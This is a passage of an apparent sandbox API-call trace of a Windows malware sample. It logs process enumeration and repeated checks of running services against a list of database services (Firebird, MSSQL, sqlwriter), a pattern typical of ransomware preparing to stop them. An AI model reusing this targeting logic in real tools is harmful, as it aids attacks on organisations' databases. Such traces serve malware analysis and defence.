[0280.079] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0280.079] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0280.079] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0280.079] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0280.079] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0280.079] lstrlenW (lpString="Spooler") returned 7 [0280.079] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0280.079] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0280.079] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0280.079] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0280.079] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0280.080] lstrlenW (lpString="StateRepository") returned 15 [0280.080] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0280.080] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0280.080] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0280.080] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0280.080] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0280.080] lstrlenW (lpString="SysMain") returned 7 [0280.184] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0280.184] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0280.184] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0280.184] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0280.185] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0280.185] lstrlenW (lpString="SystemEventsBroker") returned 18 [0280.185] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0280.185] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0280.185] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0280.185] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0280.185] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0280.185] lstrlenW (lpString="Themes") returned 6 [0280.185] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0280.185] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0280.185] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0280.185] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0280.185] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0280.185] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0280.185] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0280.185] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0280.185] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0280.185] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0280.185] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0280.185] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0280.185] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0280.185] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0280.185] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0280.185] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0280.186] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4cc7b8 | out: hHeap=0x470000) returned 1 [0280.186] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2b0 [0280.194] Process32FirstW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.195] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0280.195] lstrlenW (lpString="System") returned 6 [0280.195] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0280.196] lstrlenW (lpString="smss.exe") returned 8 [0280.196] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0280.197] lstrlenW (lpString="csrss.exe") returned 9 [0280.197] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0280.198] lstrlenW (lpString="wininit.exe") returned 11 [0280.198] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0280.199] lstrlenW (lpString="csrss.exe") returned 9 [0280.199] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0280.199] lstrlenW (lpString="winlogon.exe") returned 12 [0280.199] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0280.200] lstrlenW (lpString="services.exe") returned 12 [0280.200] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0280.201] lstrlenW (lpString="lsass.exe") returned 9 [0280.201] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0280.201] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0280.201] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0280.202] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0280.202] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.202] lstrlenW (lpString="svchost.exe") returned 11 [0280.202] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.203] lstrlenW (lpString="svchost.exe") returned 11 [0280.203] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0280.204] lstrlenW (lpString="dwm.exe") returned 7 [0280.204] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.205] lstrlenW (lpString="svchost.exe") returned 11 [0280.205] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.206] lstrlenW (lpString="svchost.exe") returned 11 [0280.206] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.206] lstrlenW (lpString="svchost.exe") returned 11 [0280.206] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.207] lstrlenW (lpString="svchost.exe") returned 11 [0280.207] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.208] lstrlenW (lpString="svchost.exe") returned 11 [0280.208] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.208] lstrlenW (lpString="svchost.exe") returned 11 [0280.208] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.209] lstrlenW (lpString="svchost.exe") returned 11 [0280.209] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.210] lstrlenW (lpString="svchost.exe") returned 11 [0280.210] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.211] lstrlenW (lpString="svchost.exe") returned 11 [0280.211] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.212] lstrlenW (lpString="svchost.exe") returned 11 [0280.212] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0280.213] lstrlenW (lpString="spoolsv.exe") returned 11 [0280.213] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.213] lstrlenW (lpString="svchost.exe") returned 11 [0280.213] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0280.214] lstrlenW (lpString="audiodg.exe") returned 11 [0280.214] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0280.215] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0280.215] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0280.215] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0280.215] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0280.216] lstrlenW (lpString="Memory Compression") returned 18 [0280.216] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3e4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0280.217] lstrlenW (lpString="taskhostw.exe") returned 13 [0280.217] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0280.217] lstrlenW (lpString="sihost.exe") returned 10 [0280.217] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.283] lstrlenW (lpString="svchost.exe") returned 11 [0280.283] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x900, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3e4, pcPriClassBase=6, dwFlags=0x0, szExeFile="MDMAgent.exe")) returned 1 [0280.284] lstrlenW (lpString="MDMAgent.exe") returned 12 [0280.284] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0280.284] lstrlenW (lpString="taskhostw.exe") returned 13 [0280.284] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0280.285] lstrlenW (lpString="explorer.exe") returned 12 [0280.285] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0280.286] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0280.286] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0280.286] lstrlenW (lpString="SearchUI.exe") returned 12 [0280.286] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0280.287] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0280.287] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0280.288] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0280.288] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0280.288] lstrlenW (lpString="dllhost.exe") returned 11 [0280.288] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0280.289] lstrlenW (lpString="mobsync.exe") returned 11 [0280.289] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0280.290] lstrlenW (lpString="wdgmug.exe") returned 10 [0280.290] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0280.290] lstrlenW (lpString="cmd.exe") returned 7 [0280.290] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0280.291] lstrlenW (lpString="conhost.exe") returned 11 [0280.291] Process32NextW (in: hSnapshot=0x2b0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0280.291] CloseHandle (hObject=0x2b0) returned 1 [0280.292] Sleep (dwMilliseconds=0x1f4) [0283.211] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4adf98 [0283.212] EnumServicesStatusExW (in: hSCManager=0x4adf98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0283.212] GetLastError () returned 0xea [0283.212] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1b4e) returned 0x4011ea8 [0283.212] EnumServicesStatusExW (in: hSCManager=0x4adf98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4011ea8, cbBufSize=0x1b4e, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4011ea8, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0283.214] CloseServiceHandle (hSCObject=0x4adf98) returned 1 [0283.214] lstrlenW (lpString="AppXSvc") returned 7 [0283.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0283.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0283.214] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0283.214] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0283.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0283.214] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0283.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0283.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0283.214] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0283.215] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0283.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0283.215] lstrlenW (lpString="Audiosrv") returned 8 [0283.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0283.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0283.215] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0283.215] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0283.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0283.215] lstrlenW (lpString="BFE") returned 3 [0283.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0283.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0283.215] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0283.215] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0283.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0283.215] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0283.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0283.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0283.215] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0283.215] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0283.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0283.215] lstrlenW (lpString="CDPSvc") returned 6 [0283.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0283.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0283.215] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0283.215] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0283.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0283.215] lstrlenW (lpString="ClickToRunSvc") returned 13 [0283.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0283.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0283.216] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0283.216] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0283.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0283.216] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0283.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0283.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0283.216] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0283.216] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0283.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0283.216] lstrlenW (lpString="CryptSvc") returned 8 [0283.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0283.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0283.216] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0283.216] lstrcmpiW (lpString1="mssqlserver", 